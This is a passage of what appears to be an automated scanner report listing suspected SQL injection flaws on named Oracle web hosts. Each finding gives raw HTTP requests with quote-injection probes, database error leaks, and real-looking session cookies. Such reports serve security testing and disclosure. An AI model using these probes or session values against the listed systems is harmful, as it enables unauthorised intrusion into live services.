s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 1
HTTP/1.1 500 Internal Server Error-10g/10.1.3.0.0 Oracle-HTTP-Server0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-0 0933: SQL command not properly ended<br> at oracle.jdbc.driver.Datab...[SNIP]...
Request 2
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012°ree=Bachelors&major=xss&curloc=xss&ploc=xss'' &position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 2
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/campus/HR/us-profile-direct.jsp0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus/html4/loose.dtd">...[SNIP]...
1.11. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [position1 parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-profile-add-direct.jsp
Issue detail
The position1 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the position1 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012°ree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA' &position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 1
HTTP/1.1 500 Internal Server Error-10g/10.1.3.0.0 Oracle-HTTP-Server0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-0 0933: SQL command not properly ended<br> at oracle.jdbc.driver.Datab...[SNIP]...
Request 2
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012°ree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA'' &position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 2
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/campus/HR/us-profile-direct.jsp0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus/html4/loose.dtd">...[SNIP]...
1.12. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [position2 parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-profile-add-direct.jsp
Issue detail
The position2 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the position2 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012°ree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any' &position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 1
HTTP/1.1 500 Internal Server Error-10g/10.1.3.0.0 Oracle-HTTP-Server0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-0 0933: SQL command not properly ended<br> at oracle.jdbc.driver.Datab...[SNIP]...
Request 2
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012°ree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any'' &position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 2
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/campus/HR/us-profile-direct.jsp0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus/html4/loose.dtd">...[SNIP]...
1.13. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [position3 parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-profile-add-direct.jsp
Issue detail
The position3 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the position3 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012°ree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss' &Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 1
HTTP/1.1 500 Internal Server Error-10g/10.1.3.0.0 Oracle-HTTP-Server0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-0 0933: SQL command not properly ended<br> at oracle.jdbc.driver.Datab...[SNIP]...
Request 2
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012°ree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss'' &Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 2
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/campus/HR/us-profile-direct.jsp0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus/html4/loose.dtd">...[SNIP]...
1.14. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [university parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-profile-add-direct.jsp
Issue detail
The university parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the university parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss' &gdate=01%2F01%2F2012°ree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 1
HTTP/1.1 500 Internal Server Error-10g/10.1.3.0.0 Oracle-HTTP-Server0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-0 0933: SQL command not properly ended<br> at oracle.jdbc.driver.Datab...[SNIP]...
Request 2
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss'' &gdate=01%2F01%2F2012°ree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 2
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/campus/HR/us-profile-direct.jsp0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus/html4/loose.dtd">...[SNIP]...
1.15. https://cloud.oracle.com/mycloud/wwv_flow.accept [p_arg_names parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
https://cloud.oracle.com
Path:
/mycloud/wwv_flow.accept
Issue detail
The p_arg_names parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p_arg_names parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
POST /mycloud/wwv_flow.accept HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/mycloud/f?p=service2:notify_me:0:::::;q=0.3DD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815515990; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA_step_id=1&p_instance=4454627354458997&p_page_submission_id=2015700381117342&p_request=CREATE&p_arg_names=77163203970299379' &p_t01=&p_arg_names=77163411158299380&p_t02=&p_arg_names=77163605215299380&p_t03=&p_arg_names=77163016753299379&p_t04=&p_arg_names=77162817151299379&p_t05=&p_arg_names=77163813569299380&p_arg_names=77...[SNIP]...
Response
HTTP/1.1 200 OK-11g_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:39:48 GMT; path=/...[SNIP]... ORA-0 6502: PL/SQL: numeric or value error: character to number conversion error</td>...[SNIP]...
1.16. https://cloud.oracle.com/mycloud/wwv_flow.accept [p_flow_step_id parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
https://cloud.oracle.com
Path:
/mycloud/wwv_flow.accept
Issue detail
The p_flow_step_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p_flow_step_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
POST /mycloud/wwv_flow.accept HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/mycloud/f?p=service2:notify_me:0:::::;q=0.3DD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815515990; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA_step_id=1' &p_instance=4454627354458997&p_page_submission_id=2015700381117342&p_request=CREATE&p_arg_names=77163203970299379&p_t01=&p_arg_names=77163411158299380&p_t02=&p_arg_names=77163605215299380&p_t03=&p_arg...[SNIP]...
Response
HTTP/1.1 200 OK-11g_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:39:39 GMT; path=/>ERR-1412 Unable to resolve page alias (1').</td></tr><tr><td></td><td></td><td>ORA-0 6502: PL/SQL: numeric or value error: character to number conversion error...[SNIP]...
1.17. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [User-Agent HTTP header]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://crmondemand.oracle.com
Path:
/ocom/resources/wcm/sitestudio/wcm.toggle.js
Issue detail
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1%2527 .com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response 1
HTTP/1.1 404 Not Found"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=60+0;age=10;ecid=49477574165541145,0:1)Error Page 404</title>...[SNIP]...
Request 2
GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1%2527%2527 .com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response 2
HTTP/1.1 200 OKeb45c0"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=73;ecid=49941499352986214,0:1)////////////////////////////////////////////////////...[SNIP]...
